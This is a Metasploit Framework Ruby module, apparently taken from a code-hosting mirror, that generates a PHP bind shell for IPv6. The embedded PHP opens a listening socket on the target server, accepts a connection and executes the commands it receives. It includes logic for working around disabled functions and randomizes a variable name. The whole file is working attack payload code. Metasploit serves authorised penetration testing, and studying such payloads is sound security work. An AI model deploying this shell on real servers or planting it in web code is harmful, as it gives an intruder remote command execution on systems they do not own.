/modules/payloads/singles/php/bind_php_ipv6.rb
https://bitbucket.org/cfield/metasploit-framework · Ruby · 87 lines · 62 code · 11 blank · 14 comment · 9 complexity · edb80d37285edb5f4c65064ff513ec67 MD5 · raw file
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # web site for more information on licensing and terms of use.
- # http://metasploit.com/
- ##
- require 'msf/core'
- require 'msf/core/payload/php'
- require 'msf/core/handler/bind_tcp'
- require 'msf/base/sessions/command_shell'
- require 'msf/base/sessions/command_shell_options'
- module Metasploit3
- include Msf::Payload::Single
- include Msf::Payload::Php
- include Msf::Sessions::CommandShellOptions
- def initialize(info = {})
- super(merge_info(info,
- 'Name' => 'PHP Command Shell, Bind TCP (via php) IPv6',
- 'Description' => 'Listen for a connection and spawn a command shell via php (IPv6)',
- 'Author' => ['egypt', 'diaul <diaul@devilopers.org>',],
- 'License' => BSD_LICENSE,
- 'Platform' => 'php',
- 'Arch' => ARCH_PHP,
- 'Handler' => Msf::Handler::BindTcp,
- 'Session' => Msf::Sessions::CommandShell,
- 'PayloadType' => 'cmd',
- 'Payload' =>
- {
- 'Offsets' => { },
- 'Payload' => ''
- }
- ))
- end
- #
- # PHP Bind Shell
- #
- def php_bind_shell
- dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
- shell = <<-END_OF_PHP_CODE
- #{php_preamble({:disabled_varname => dis})}
- $port=#{datastore['LPORT']};
- $scl='socket_create_listen';
- if(is_callable($scl)&&!in_array($scl,#{dis})){
- $sock=@$scl($port);
- }else{
- $sock=@socket_create(AF_INET6,SOCK_STREAM,SOL_TCP);
- $ret=@socket_bind($sock,0,$port);
- $ret=@socket_listen($sock,5);
- }
- $msgsock=@socket_accept($sock);
- @socket_close($sock);
- while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
- {
- $o = '';
- $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);
- if(FALSE===$c){break;}
- if(substr($c,0,3) == 'cd '){
- chdir(substr($c,3,-1));
- } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
- break;
- }else{
- #{php_system_block({:cmd_varname=>"$c", :output_varname=>"$o", :disabled_varname => dis})}
- }
- @socket_write($msgsock,$o,strlen($o));
- }
- @socket_close($msgsock);
- END_OF_PHP_CODE
- return shell
- end
- #
- # Constructs the payload
- #
- def generate
- return super + php_bind_shell
- end
- end